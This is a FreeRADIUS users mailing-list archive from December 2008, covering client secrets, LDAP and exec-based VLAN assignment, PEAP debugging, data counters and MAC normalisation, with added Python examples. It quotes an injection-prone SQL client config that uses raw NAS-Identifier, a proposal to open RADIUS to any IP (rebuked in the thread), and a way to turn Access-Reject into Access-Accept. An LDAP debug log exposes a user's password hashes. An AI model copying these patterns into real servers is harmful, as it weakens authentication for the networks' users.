Re: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Eric Geier wrote:
> Thank you for the info, David. I think the following is an example of how this could work, which I googled:
>
> client 212.37.57.2 {
>     secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}"
>     shortname = "just one of our example networks"
> }
>
> I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible?
>
> clients.conf
> client 0.0.0.0/0, shared secret = "open" ...

Why bother doing the SQL stuff, if you're going to let anyone use your service anyway? Think about it ... clients.conf controls which APs/NAS' are allowed to send you stuff to process. If your intention is to open it for anyone that can reach your service, why then do the above? The end clients are not what will send you requests, the APs are ... I think you've missed the point of the IP addressing for the end clients versus how you wish to handle the APs ...

And for a service which allows or denies access for your internal users, I wouldn't personally allow anyone from the outside world to even get close to that service. You want to understand basic networking and security considerations before seriously contemplating this. Start looking at getting a VPN solution between your offices, or simply just put one FreeRADIUS box in each office.

Continue on this path and fairly soon someone will have found your wireless setup and the service which allows clients to authenticate sitting out in the open. You might as well not have anything in place at all then...

//anders

> This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at.
>
> Thanks!
> Eric
>
> -----Original Message-----
> From: freeradius-users-bounces+me=egeier@lists.freeradius.org [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On Behalf Of wlanmac
> Sent: Wednesday, December 17, 2008 8:42 AM
> To: freeradius-users@lists.freeradius.org
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
>
> It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2.
>
> David
> coova.org
>
> Date: Wed, 17 Dec 2008 10:16:17 +0200
> From: Johan Meiring
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
> To: FreeRadius users mailing list
> Message-ID: <4948b551.6030...@pcservices.co.za>
>
> Eric Geier wrote:
> > If I understand what you said, I would only need one IP entry (the Internet IP) in the config file for each location, right? Most of these locations will be using dynamic Internet IPs; I'm not sure how I'd keep the config updated. Plus this would make each location/network use the same shared secret among all their APs, which I want to prevent.
>
> Alan,
>
> The Nas-Identifier being available to dynamic clients will also solve Eric's problem.
>
> Any update on when it might be available?
>
> Thanks!
Re: external script reply
Hi,

I don't know why but it doesn't work. I post here my config and debug:

---
When I try php-cli, my php file works fine:

r...@ubuntu# ./getvlan.php Hege
Tunnel-Type = VLAN
Tunnel-Medium-Type = IEEE-802
Tunnel-Private-Group-Id = vlan20

--
The exec module:

exec {
        // is this part important?
        wait = no
        input_pairs = request
        shell_escape = yes
        output = none
}

exec get-vlan {
        wait = yes
        program = "/usr/local/etc/raddb/scripts/getvlan.php %{mschap:User-Name}"
        input-pairs = request
        output-pairs = reply
        packet-type = Access-Accept
        #shell-escape = yes
}

My get-vlan "module" is in the post-auth section.

Here is the debug:

+- entering group post-auth {...}
[get-vlan]      expand: %{mschap:User-Name} -> Hege
Exec-Program output: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 Tunnel-Private-Group-Id = vlan20
Exec-Program-Wait: plaintext: Tunnel-Type = VLAN Tunnel-Medium-Type = IEEE-802 Tunnel-Private-Group-Id = vlan20
Exec-Program: returned: 0
++[get-vlan] returns ok
} # server inner-tunnel
[peap] Got tunneled reply code 2
        EAP-Message = 0x03090004
        Message-Authenticator = 0x
        User-Name = "TEST\\Hege"
[peap] Got tunneled reply RADIUS code 2
        EAP-Message = 0x03090004
        Message-Authenticator = 0x
        User-Name = "TEST\\Hege"
[peap] Tunneled authentication was successful.
[peap] SUCCESS
[peap] Saving tunneled attributes for later

What is wrong?

Thank you,
Gabor

t...@kalik.net wrote:
> > I use external php script to get information from the ldap.
> >
> > exec getdata {
> >         program = .../sg.php %{User-Name}
> >         ..?..
> > }
> >
> > post-auth {
> >         getdata
> > }
> >
> > in the php script I do an ldap query with the argument,
> > and take the important data (three words) into variables.
> >
> > How can I take these 3 data back to the Tunnel-Type, Tunnel-Medium-Type
> > and Tunnel-Private-Group-Id items of the freeRadius.
>
> Print them out (echo). One per line.
>
> Ivan Kalik
> Kalik Informatika ISP
Conf PEAP
Hello gentlemen,

I am configuring PEAP and there is not much information about it. Should I add a user in the users file alone? If default is configured with EAP, what should I modify in another file?

Thanks.

logout:

rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=220, length=156
        User-Name = "DOMINIO\\msilvero"
        Framed-MTU = 1400
        Called-Station-Id = "0019.2fdb.9e00"
        Calling-Station-Id = "001f.3c22.44c5"
        Service-Type = Login-User
        Message-Authenticator = 0x8cc6da388d8df7f5ec4355457fe64969
        EAP-Message = 0x020100130149504c414e5c6d73696c7665726f
        NAS-Port-Type = Wireless-802.11
        NAS-Port = 474
        NAS-IP-Address = 10.10.1.21
        NAS-Identifier = "ap-ap"
+- entering group authorize {...}
++[preprocess] returns ok
++[chap] returns noop
++[mschap] returns noop
[suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL
[suffix] No such realm "NULL"
++[suffix] returns noop
[eap] EAP packet type response id 1 length 19
[eap] No EAP Start, assuming it's an on-going EAP conversation
++[eap] returns updated
++[unix] returns notfound
++[files] returns noop
++[expiration] returns noop
++[logintime] returns noop
[pap] WARNING! No "known good" password found for the user. Authentication may fail because of this.
++[pap] returns noop
Found Auth-Type = EAP
+- entering group authenticate {...}
[eap] EAP Identity
[eap] processing type tls
[tls] Initiate
[tls] Start returned 1
++[eap] returns handled
Sending Access-Challenge of id 220 to 10.10.1.21 port 1645
        EAP-Message = 0x010200061920
        Message-Authenticator = 0x
        State = 0x34d23a2734d023bc90d78d0fbe96492c
Finished request 0.
Going to the next request
Waking up in 4.9 seconds.
rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=221, length=263
        User-Name = "DOMINIO\\msilvero"
        Framed-MTU = 1400
        Called-Station-Id = "0019.2fdb.9e00"
        Calling-Station-Id = "001f.3c22.44c5"
        Service-Type = Login-User
        Message-Authenticator = 0x3491a2750461cd5efdc8648bf46aa49a
        EAP-Message = 0x0202006c19001603010061015d030149493f85acfcc0f2c2c47fe6fa7a57d6e421cff26116506231b3776199ed10e23600390038003500160013000a00330032002f0007006600050004006300620061001500120009006500640060001400110008000600030100
        NAS-Port-Type = Wireless-802.11
        NAS-Port = 474
        State = 0x34d23a2734d023bc90d78d0fbe96492c
        NAS-IP-Address = 10.10.1.21
        NAS-Identifier = "ap-ap"
+- entering group authorize {...}
++[preprocess] returns ok
++[chap] returns noop
++[mschap] returns noop
[suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL
[suffix] No such realm "NULL"
++[suffix] returns noop
[eap] EAP packet type response id 2 length 108
[eap] Continuing tunnel setup.
++[eap] returns ok
Found Auth-Type = EAP
+- entering group authenticate {...}
[eap] Request found, released from the list
[eap] EAP/peap
[eap] processing type peap
[peap] processing EAP-TLS
[peap] eaptls_verify returned 7
[peap] Done initial handshake
[peap]     (other): before/accept initialization
[peap] TLS_accept: before/accept initialization
[peap] <<< TLS 1.0 Handshake [length 0061], ClientHello
[peap] TLS_accept: SSLv3 read client hello A
[peap] >>> TLS 1.0 Handshake [length 002a], ServerHello
[peap] TLS_accept: SSLv3 write server hello A
[peap] >>> TLS 1.0 Handshake [length 085e], Certificate
[peap] TLS_accept: SSLv3 write certificate A
[peap] >>> TLS 1.0 Handshake [length 020d], ServerKeyExchange
[peap] TLS_accept: SSLv3 write key exchange A
[peap] >>> TLS 1.0 Handshake [length 0004], ServerHelloDone
[peap] TLS_accept: SSLv3 write server done A
[peap] TLS_accept: SSLv3 flush data
[peap] TLS_accept: Need to read more data: SSLv3 read client certificate A
In SSL Handshake Phase
In SSL Accept mode
[peap] eaptls_process returned 13
[peap] EAPTLS_HANDLED
++[eap] returns handled
Sending Access-Challenge of id 221 to 10.10.1.21 port 1645
[...]
Going to the next request
Waking up in 4.8 seconds.
Cleaning up request 0 ID 220 with timestamp +68
Waking up in 0.1 seconds.
Cleaning up request 1 ID 221 with timestamp +68
Ready to process requests.
rad_recv: Access-Request packet from host 10.10.1.21 port 1645, id=222, length=156
        User-Name = "DOMINIO\\msilvero"
        Framed-MTU = 1400
        Called-Station-Id = "0019.2fdb.9e00"
        Calling-Station-Id = "001f.3c22.44c5"
        Service-Type = Login-User
        Message-Authenticator = 0x862b4eedab979983e604c4836e8ac526
        EAP-Message = 0x020100130149504c414e5c6d73696c7665726f
        NAS-Port-Type = Wireless-802.11
        NAS-Port = 475
        NAS-IP-Address = 10.10.1.21
        NAS-Identifier = "ap-ap"
+- entering group authorize {...}
++[preprocess] returns ok
++[chap] returns noop
++[mschap] returns noop
[suffix] No '@' in User-Name = "DOMINIO\msilvero", looking up realm NULL
[suffix] N
RE: Duplicate IPs for Radius Clients with different secrets - allow any client IP?
Thank you for the info, David. I think the following is an example of how this could work, which I googled:

> client 212.37.57.2 {
>         secret = "%{sql:SELECT secret FROM accesspoints WHERE id = %{raw:NAS-Identifier}}"
>         shortname = "just one of our example networks"
> }

I'm thinking I could even just have one client entry like this...but set to allow any IP. Is that possible? This would prevent me from having to track Internet IP changes among the multiple offices and locations where these separate WPA-Enterprise networks will be located at.

Thanks!
Eric

> -----Original Message-----
> From: freeradius-users-bounces+me=egeier@lists.freeradius.org
> [mailto:freeradius-users-bounces+me=egeier@lists.freeradius.org] On
> Behalf Of wlanmac
> Sent: Wednesday, December 17, 2008 8:42 AM
> To: freeradius-users@lists.freeradius.org
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
>
> It's easy! Just google for rlm_raw and use it with a SQL xlat rule to
> pick out the shared secret from a database. I have been doing this way
> for years... in FreeRADIUS v1 and v2.
>
> David
> coova.org
>
> > Date: Wed, 17 Dec 2008 10:16:17 +0200
> > From: Johan Meiring
> > Subject: Re: Duplicate IPs for Radius Clients with different secrets
> > To: FreeRadius users mailing list
> > Message-ID: <4948b551.6030...@pcservices.co.za>
> > Content-Type: text/plain; charset=ISO-8859-1; format=flowed
> >
> > Eric Geier wrote:
> > > If I understand what you said, I would only need one IP entry (the
> > > Internet IP) in the config file for each location, right?
> > >
> > > Most of these locations will be using dynamic Internet IPs; I'm not
> > > sure how'd I keep the config updated. Plus this would make each
> > > location/network use the same shared secret among all their APs,
> > > which I want to prevent.
> >
> > Alan,
> >
> > The Nas-Identifier being available to dynamic clients will also solve
> > Eric's problem.
> >
> > Any update on when it might be available?
> >
> > Thanks!
> >
> > --
> > Johan Meiring
> > Cape PC Services CC
> > Tel: (021) 883-8271
> > Fax: (021) 886-7782
Re: WISPr-Bandwidth question
Hello Kevin,

I can't answer definitively, but I would assume that it would be done on your NAS (depending on your hardware these rules "could" be propagated to the child devices). It would defy all logic for it to be done on the client. Just as you would in an unauthenticated wired/wireless network, it is always best to control traffic at the distribution point.

Hope that helps.

Take Care,
Leigh Martell

On Wed, Dec 17, 2008 at 12:14 PM, kevin wrote:
> While an "out of the box" solution is where I'll probably end up, I'm
> battling with myself over the idea of how to best manage bandwidth on a
> network including multiple remote locations, with both wired and
> wireless connections.
>
> I'm moving to using freeradius to authenticate (which ultimately will be
> done by MAC for initial ease of setup) but I'm trying to figure out
> where the Bandwidth attributes actually are used.
>
> IOW, when using WISPr-Bandwidth, does that modify the client connection
> at the client computer or does that occur at a proxy or firewall device?
> What I'm getting at is, is a captive portal necessary or can a person
> simply have client authentication via freeradius and the client network
> card handle managing its own bandwidth? And if so, is there any
> possibility that the client computer could be modified by someone with a
> bit of skill to bypass those controls?
>
> Hope that made sense.
>
> Cheers,
>
> Kevin
WISPr-Bandwidth question
While an "out of the box" solution is where I'll probably end up, I'm battling with myself over the idea of how to best manage bandwidth on a network including multiple remote locations, with both wired and wireless connections.

I'm moving to using freeradius to authenticate (which ultimately will be done by MAC for initial ease of setup) but I'm trying to figure out where the Bandwidth attributes actually are used.

IOW, when using WISPr-Bandwidth, does that modify the client connection at the client computer or does that occur at a proxy or firewall device? What I'm getting at is, is a captive portal necessary or can a person simply have client authentication via freeradius and the client network card handle managing its own bandwidth? And if so, is there any possibility that the client computer could be modified by someone with a bit of skill to bypass those controls?

Hope that made sense.

Cheers,

Kevin
Re: FW: Working config file for data counter.
Have you read "It doesn't work" in the FAQ? Post the radiusd -X output and your counter configuration. Tell us what you expected to happen.

Ivan Kalik
Kalik Informatika ISP

On 17/12/2008, "Marcel Grandemange" wrote:
> Good Day.
>
> I am still struggling to get a working solution with freeradius and mysql as backend.
>
> What I'm trying to do simply is have the radius server use data counters instead of time counters.
>
> I want to limit a user's collective data to amounts of 1gb, 2gb, 3gb, all the way up.
>
> And it must be reset on the first of the month.
>
> I have tried many versions of freeradius with many different queries and methods and there is ALWAYS something that doesn't seem to work properly.
>
> With Freeradius 2.1.3 I cannot use anything above 4gb, although I followed instructions on wiki to the tee for overcoming the wrapping problem. (wiki was outdated, but still tried)
> With 1.1.7 I think it was I would simply get erratic responses. Sometimes worked fine with up to 8gb tested, the next month it wouldn't. 2gb limits would also only sometimes work.
> The only one that was consistent was the 1gb option.
>
> Now I've tried so many methods, versions, tricks and wikis and docs.. It's been years and still I cannot get it working correctly. There is a bit of a lack of docs on what I would like to do and I've come to the conclusion that if I could see someone else's working config for this sort of setup I could deduce where I'm going wrong.
>
> Thank You!
>
> Is the only way to get this working to pay someone? If so who can help? Just note this is private and I'm using this box to teach myself hence I can't offer much...
>
> Input?
Re: external script reply
> I use external php script to get information from the ldap.
>
> exec getdata {
>         program = .../sg.php %{User-Name}
>         ..?..
> }
>
> post-auth {
>         getdata
> }
>
> in the php script I do an ldap query with the argument,
> and take the important data (three words) into variables.
>
> How can I take these 3 data back to the Tunnel-Type, Tunnel-Medium-Type
> and Tunnel-Private-Group-Id items of the freeRadius.

Print them out (echo). One per line.

Ivan Kalik
Kalik Informatika ISP
Re: rlm_perl authentication override
Greetings, and thanks to Ivan and Alan for their feedback.

I've been dumping variables, etc, in my rlm_perl script (using Devel::Symdump and Data::Dumper) trying to figure out where to change the Packet-Type from Access-Reject to Access-Accept without success. I've also gone over the rlm_perl.c file, etc, hoping something would jump out at me -- what I'm trying to do doesn't appear to be documented (for obvious reasons).

I'm hoping someone on this list knows how to change the Packet-Type in a rlm_perl script. Any comments/pointers are appreciated. If I knew where to dig, I'd have at it.

Thanks
Henry
FW: Working config file for data counter.
> Good Day.
>
> I am still struggling to get a working solution with freeradius and mysql as backend.
>
> What I'm trying to do simply is have the radius server use data counters instead of time counters.
>
> I want to limit a user's collective data to amounts of 1gb, 2gb, 3gb, all the way up.
>
> And it must be reset on the first of the month.
>
> I have tried many versions of freeradius with many different queries and methods and there is ALWAYS something that doesn't seem to work properly.
>
> With Freeradius 2.1.3 I cannot use anything above 4gb, although I followed instructions on wiki to the tee for overcoming the wrapping problem. (wiki was outdated, but still tried)
> With 1.1.7 I think it was I would simply get erratic responses. Sometimes worked fine with up to 8gb tested, the next month it wouldn't. 2gb limits would also only sometimes work.
> The only one that was consistent was the 1gb option.
>
> Now I've tried so many methods, versions, tricks and wikis and docs.. It's been years and still I cannot get it working correctly. There is a bit of a lack of docs on what I would like to do and I've come to the conclusion that if I could see someone else's working config for this sort of setup I could deduce where I'm going wrong.
>
> Thank You!

Is the only way to get this working to pay someone? If so who can help? Just note this is private and I'm using this box to teach myself hence I can't offer much...

Input?
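The "nothing above 4gb" symptom in Marcel's message (and in Ivan's reply quoting it) is the 32-bit octet counter wrap. RADIUS Acct-Input-Octets and Acct-Output-Octets are 32-bit; RFC 2869 adds Acct-Input-Gigawords and Acct-Output-Gigawords carrying the high 32 bits, so a correct total is (gigawords << 32) | octets. The block below is an added example, not code from the thread or from FreeRADIUS's counter modules: it aggregates a user's sessions for the current calendar month (which is what "reset on the first of the month" amounts to) both the wrong way and the right way, so the difference is visible. The column names follow the stock radacct table; the rows are constructed.

```python
"""Added example, not from the thread or from FreeRADIUS: a per-user monthly
data total that does not break above 4 GB.  RADIUS octet counters are
32-bit; RFC 2869 Acct-*-Gigawords hold the high 32 bits, so the true total
is (gigawords << 32) | octets.  Rows below are constructed radacct rows."""
from datetime import datetime

GB = 1024 ** 3


def naive_total(row):
    """What a counter query that ignores Gigawords sees: wraps at 4 GB."""
    return row["acctinputoctets"] + row["acctoutputoctets"]


def total_octets(row):
    """64-bit traffic total for one session, Gigawords included."""
    inp = (row.get("acctinputgigawords", 0) << 32) | row["acctinputoctets"]
    out = (row.get("acctoutputgigawords", 0) << 32) | row["acctoutputoctets"]
    return inp + out


def monthly_usage(rows, username, year, month, total=total_octets):
    """Sum of sessions that started in the given calendar month.  Keying the
    window on the month is what makes the figure 'reset on the 1st'."""
    return sum(total(r) for r in rows
               if r["username"] == username
               and r["acctstarttime"].year == year
               and r["acctstarttime"].month == month)


def over_cap(rows, username, cap_bytes, now):
    """True when the user has reached cap_bytes in the month containing now."""
    return monthly_usage(rows, username, now.year, now.month) >= cap_bytes


# Constructed rows: one 6 GB session this month (1 Gigaword = 4 GiB plus
# 1 GiB of octets inbound, 1 GiB outbound) and one 3 GB session last month.
ROWS = [
    {"username": "marcel", "acctstarttime": datetime(2008, 12, 3, 9, 0),
     "acctinputoctets": 1 * GB, "acctinputgigawords": 1,
     "acctoutputoctets": 1 * GB, "acctoutputgigawords": 0},
    {"username": "marcel", "acctstarttime": datetime(2008, 11, 20, 9, 0),
     "acctinputoctets": 2 * GB, "acctinputgigawords": 0,
     "acctoutputoctets": 1 * GB, "acctoutputgigawords": 0},
]

if __name__ == "__main__":
    now = datetime(2008, 12, 18)
    print("naive December total (GB):", monthly_usage(ROWS, "marcel", 2008, 12, naive_total) / GB)
    print("real December total (GB): ", monthly_usage(ROWS, "marcel", 2008, 12) / GB)
    print("over a 5 GB cap:", over_cap(ROWS, "marcel", 5 * GB, now))
```

The same arithmetic belongs in whatever SQL the counter module runs; if the accounting INSERT already folds Gigawords into a 64-bit column, the query must not re-add them, and if it does not, the SUM must shift them in as above.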
Re: mac2vlan
alois blasbichler wrote:
> I want to assign a certain vlan to a certain mac of a client-pc.
> I tried the module mac2vlan - is there a better/other way ?
> But it does not work.

That module is intended to be used for the VMPS protocol, not RADIUS.

> I created the file ${confdir}/mac2vlan with :
> 00:40:96:B4:5B:0F,TECH-WLAN
>
> But normally a vlan is defined with a number like "155".
> How should this work ?
> Am i missing something important ?
>
> What other steps i have to do ?

You can configure the VLAN via RADIUS attributes.

Alan DeKok.
Re: rlm_perl authentication override
Henry wrote:
> I'm wondering though: during that small window period when the
> Packet-Type is changed and returned, would it be possible that it would
> affect other sessions running concurrently (separate threads)?

No. When you do an LDAP query for a request, or process a request through the "users" file, it doesn't affect other requests that are being processed.

Alan DeKok.
mac2vlan
Hello list

I want to assign a certain vlan to a certain mac of a client-pc.
I tried the module mac2vlan - is there a better/other way ?
But it does not work.

I created the file ${confdir}/mac2vlan with :
00:40:96:B4:5B:0F,TECH-WLAN

But normally a vlan is defined with a number like "155".
How should this work ?
Am I missing something important ?

What other steps do I have to do ?

Thank you
luis
Re: rlm_perl authentication override
Quoting t...@kalik.net:
> So check the "circumstances" before changing the Packet-Type.

Of course, you are right :p, thanks.

I'm wondering though: during that small window period when the Packet-Type is changed and returned, would it be possible that it would affect other sessions running concurrently (separate threads)? Presumably the changed Packet-Type would have a limited scope (ie, visible to the current executing thread/session only, and not others)?

Regards
Henry
Re: rlm_perl authentication override
> Changing freeradius.internal Packet-Type from Access-Reject to
> Access-Accept would affect ALL logins - even logins which *should* be
> rejected.
>
> I'm referring to changing Access-Reject to Access-Accept under certain
> circumstances only -- not globally for all logins.

So check the "circumstances" before changing the Packet-Type.

Ivan Kalik
Kalik Informatika ISP
WiMAX Auth
Here's my problem:

Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: WiMAX-MN-NAI was not found in the request or in the reply.
Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: We cannot calculate MN-HA keys.
Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: WiMAX-IP-Technology not found in reply.
Wed Dec 17 15:53:16 2008 : Info: [wimax] WARNING: Not calculating MN-HA keys

My question is, where do I add these replies? I currently have my radius doing its lookups in a MySQL database.

- Milligan -
external script reply
Hi,

I have a question. I use external php script to get information from the ldap.

exec getdata {
        program = .../sg.php %{User-Name}
        ..?..
}

post-auth {
        getdata
}

in the php script I do an ldap query with the argument, and take the important data (three words) into variables.

How can I take these 3 data back to the Tunnel-Type, Tunnel-Medium-Type and Tunnel-Private-Group-Id items of the freeRadius?

like:
        $RAD_REPLY{'Reply-Message'} = 'salala'
in perl (from wiki)

please help
thanks
Gabor
Re: rlm_perl authentication override
Quoting t...@kalik.net:
> > Is there a way to change the reply from Access-Reject, to Access-Accept?
>
> Change freeradius.internal attribute Packet-Type in Post-Auth-Type Reject section.

Changing freeradius.internal Packet-Type from Access-Reject to Access-Accept would affect ALL logins - even logins which *should* be rejected.

I'm referring to changing Access-Reject to Access-Accept under certain circumstances only -- not globally for all logins.

...or am I misunderstanding what you're suggesting?

Thanks
Henry
Re: Duplicate IPs for Radius Clients with different secrets
It's easy! Just google for rlm_raw and use it with a SQL xlat rule to pick out the shared secret from a database. I have been doing this way for years... in FreeRADIUS v1 and v2.

David
coova.org

> Date: Wed, 17 Dec 2008 10:16:17 +0200
> From: Johan Meiring
> Subject: Re: Duplicate IPs for Radius Clients with different secrets
> To: FreeRadius users mailing list
> Message-ID: <4948b551.6030...@pcservices.co.za>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> Eric Geier wrote:
> >
> > If I understand what you said, I would only need one IP entry (the Internet
> > IP) in the config file for each location, right?
> >
> > Most of these locations will be using dynamic Internet IPs; I'm not sure
> > how'd I keep the config updated. Plus this would make each location/network
> > use the same shared secret among all their APs, which I want to prevent.
>
> Alan,
>
> The Nas-Identifier being available to dynamic clients will also solve
> Eric's problem.
>
> Any update on when it might be available?
>
> Thanks!
>
> --
> Johan Meiring
> Cape PC Services CC
> Tel: (021) 883-8271
> Fax: (021) 886-7782
Re: IP per user
2008/12/17 :
> AP uses DHCP not radius to assign IPs. So - no. You can reserve IPs for
> devices but not users.
>
> Ivan Kalik
> Kalik Informatika ISP
>
> On 17/12/2008, "Sergio Belkin" wrote:
> > Hi,
> >
> > I wonder if radius can force a given user, e.g. jdoe, to always get
> > the same IP address from an Access Point?
> >
> > Thanks in advance
> > --
> > Open Kairos http://www.openkairos.com
> > Watch More TV http://sebelk.blogspot.com
> > Sergio Belkin -

Thanks Ivan, I guess that

--
Open Kairos http://www.openkairos.com
Watch More TV http://sebelk.blogspot.com
Sergio Belkin -
Re: IP per user
AP uses DHCP not radius to assign IPs. So - no. You can reserve IPs for devices but not users.

Ivan Kalik
Kalik Informatika ISP

On 17/12/2008, "Sergio Belkin" wrote:
> Hi,
>
> I wonder if radius can force a given user, e.g. jdoe, to always get
> the same IP address from an Access Point?
>
> Thanks in advance
> --
> Open Kairos http://www.openkairos.com
> Watch More TV http://sebelk.blogspot.com
> Sergio Belkin -
Re: rlm_perl authentication override
Quoting t...@kalik.net:
> > Is there a way to change the reply from Access-Reject, to Access-Accept?
>
> There is a way to change the packet type but it is a bad idea. Placing
> unauthorized users in something like a guest VLAN should be the part of
> your NAS functionality, rather than (deliberately) breaking authentication
> on the radius server.

Thanks for the response, Ivan.

We don't have access to the NAS servers (we merely auth) and this is the only way we can do this cleanly (without physically unlocking the user, managing that process, etc).

Can you provide pointers on how to change the reply?

Thanks
Henry
Re: vlan in ldap - full version
> It should be "replyItem".

> Not replay, reply.

So it works! Thank you very much - for several hours I searched for the error.

by luis
Re: vlan in ldap - full version
Not replay, reply.

Ivan Kalik
Kalik Informatika ISP

On 17/12/2008, "alois blasbichler" wrote:
> > You have configured these as *check* items, not as *reply* items. Fix
> > that.
>
> Hello
>
> Thank you.
>
> I changed to
> ---
> replayItem Tunnel-Type                  radiusTunnelType
> replayItem Tunnel-Medium-Type           radiusTunnelMediumType
> replayItem Tunnel-Private-Group-Id      radiusTunnelPrivateGroupId
>
> But so it says that :
>
> By
> luis
>
> rlm_ldap: performing search in dc=sb-brixen,dc=it, with filter (uid=test)
> [ldap] Added User-Password = {MD5}qmP3j3bSY61V2vpYrvPZTg== in check items
> [ldap] looking for check items in directory...
> rlm_ldap: sambaNTPassword -> NT-Password == 0x3730353833444539334132364235333932313639333235314644313734413841
> rlm_ldap: sambaLMPassword -> LM-Password == 0x3037414538333031344236393035433631323837303833414331353839444544
> [ldap] looking for reply items in directory...
> [ldap] user test authorized to use remote access
> rlm_ldap: ldap_release_conn: Release Id: 0
> ++[ldap] returns ok
> ++[expiration] returns noop
Re: vlan in ldap - full version
alois blasbichler wrote:
[...]
> I changed to
> ---
> replayItem Tunnel-Type                  radiusTunnelType
> replayItem Tunnel-Medium-Type           radiusTunnelMediumType
> replayItem Tunnel-Private-Group-Id      radiusTunnelPrivateGroupId
>
> But so it says that :

It should be "replyItem".

Kind regards,

--
Lech Karol Pawłaszek
"You will never see me fall from grace" [KoRn]
Re: vlan in ldap - full version
> You have configured these as *check* items, not as *reply* items. Fix
> that.

Hello

Thank you.

I changed to
---
replayItem Tunnel-Type                  radiusTunnelType
replayItem Tunnel-Medium-Type           radiusTunnelMediumType
replayItem Tunnel-Private-Group-Id      radiusTunnelPrivateGroupId

But so it says that :

By
luis

rlm_ldap: performing search in dc=sb-brixen,dc=it, with filter (uid=test)
[ldap] Added User-Password = {MD5}qmP3j3bSY61V2vpYrvPZTg== in check items
[ldap] looking for check items in directory...
rlm_ldap: sambaNTPassword -> NT-Password == 0x3730353833444539334132364235333932313639333235314644313734413841
rlm_ldap: sambaLMPassword -> LM-Password == 0x3037414538333031344236393035433631323837303833414331353839444544
[ldap] looking for reply items in directory...
[ldap] user test authorized to use remote access
rlm_ldap: ldap_release_conn: Release Id: 0
++[ldap] returns ok
++[expiration] returns noop
Re: How to log failed auth attempts?
Todd R. wrote:
> It seems that most things I have read suggest that failed authentication
> attempts are logged to the radius.log by default but they do not show up for
> me.

Edit raddb/radiusd.conf, and read the "log" section. It has configuration entries that control this behavior.

Alan DeKok.
Re: Duplicate IPs for Radius Clients with different secrets
Johan Meiring wrote:
> The Nas-Identifier being available to dynamic clients will also solve
> Eric's problem.
>
> Any update on when it might be available?

No. Maybe some time next year.

Alan DeKok.
Re: vlan in ldap - full version
alois blasbichler wrote:
> I am trying to assign different vlans for my different Radius-users.
> The good news is that with a user defined in the users file it works fine.
...
> The message i get:
>
> [ldap] looking for check items in directory...
> rlm_ldap: radiusTunnelPrivateGroupId -> Tunnel-Private-Group-Id:0 == "154"
> rlm_ldap: radiusTunnelMediumType -> Tunnel-Medium-Type:0 == IEEE-802
> rlm_ldap: radiusTunnelType -> Tunnel-Type:0 == VLAN

You have configured these as *check* items, not as *reply* items. Fix that.

Alan DeKok.
IP per user
Hi,

I wonder if radius can force a given user, e.g. jdoe, to always get the same IP address from an Access Point?

Thanks in advance
--
Open Kairos http://www.openkairos.com
Watch More TV http://sebelk.blogspot.com
Sergio Belkin -
Re: EAP/MD5 with mysql authentication failed
> IN sites-enabled/inner-tunnel
> --
> authorize {
>         eap {
>                 ok = return
>         }
>         files
>         sql
>         expiration
>         logintime
> }
>
> authenticate {
>         eap
> }

EAP-MD5 doesn't use inner-tunnel. Enable sql in default virtual server.

Ivan Kalik
Kalik Informatika ISP
Re: vlan in ldap
alois blasbichler wrote:
> Hello list
>
> I am trying to assign different vlans for my different Radius-users.
> The good news is that with a user defined in the users file it works fine.

Check ldap.attrmap if it has these lines:

replyItem       Tunnel-Type                     radiusTunnelType
replyItem       Tunnel-Medium-Type              radiusTunnelMediumType
replyItem       Tunnel-Private-Group-Id         radiusTunnelPrivateGroupId

Kind regards,

--
Lech Karol Pawłaszek
"You will never see me fall from grace" [KoRn]
Re: Calling-Station-Id case sensitive
li...@justinawilliams.com wrote:
>
> I am not really up with perl... Is there any way that perl can rewrite
> the request and take out either the . or : or - between characters as
> well as make everything lower case?
>
> so that the calling-station-id request would be 00197da6ad06
> not 00:19:7d:a6:ad:06 or 00-19-7d-a6-ad-06 or 0019.7da6.ad06
>

I have some unlang action for this that I use:
----
if ( Calling-Station-Id =~ /^([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2})$/i ) {
        update request {
                Calling-Station-Id := "%{1}-%{2}-%{3}-%{4}-%{5}-%{6}"
        }
        update control {
                Tmp-String-0 := "%{1}%{2}%{3}%{4}%{5}%{6}"
        }
}

if ( Called-Station-Id =~ /^([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2}).?([0-9a-f]{2})$/i ) {
        update request {
                Called-Station-Id := "%{1}-%{2}-%{3}-%{4}-%{5}-%{6}"
        }
}
---

It seems to be RFCy if you keep with 00-11-22-33-44-55 as the style for MAC addresses, so outside FreeRADIUS it's stored in the RFC-manner[1] and for where I need to do 'fun' stuff[1] with it internally I use the Tmp-String-X family of internal variables.

Cheers

Alex

[1] LDAP lookups for example, such as cn=001122334455

--
Alexander Clouter
.sigmonster says: Do not use the blue keys on this terminal.
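The same normalisation as Alex's unlang, as an added example that is not part of the thread: a small Python function that accepts the three spellings named in the question (00:19:7d:a6:ad:06, 00-19-7d-a6-ad-06, 0019.7da6.ad06) plus the bare form, in any letter case, rejects anything else, and emits one canonical form before a lookup. The allow-list and sample values are constructed; the point it adds to the unlang is that the comparison is done in canonical form on both sides, so a mixed-format or upper-case entry stored in the database still matches and a non-MAC string can never match anything.

```python
"""Added example, not code from the thread or from FreeRADIUS: normalise
Calling-Station-Id before a MAC lookup.  Sample values are constructed."""
import re

_HEX2 = r"([0-9a-f]{2})"
# Six hex octet pairs, each followed by at most one separator from : - .
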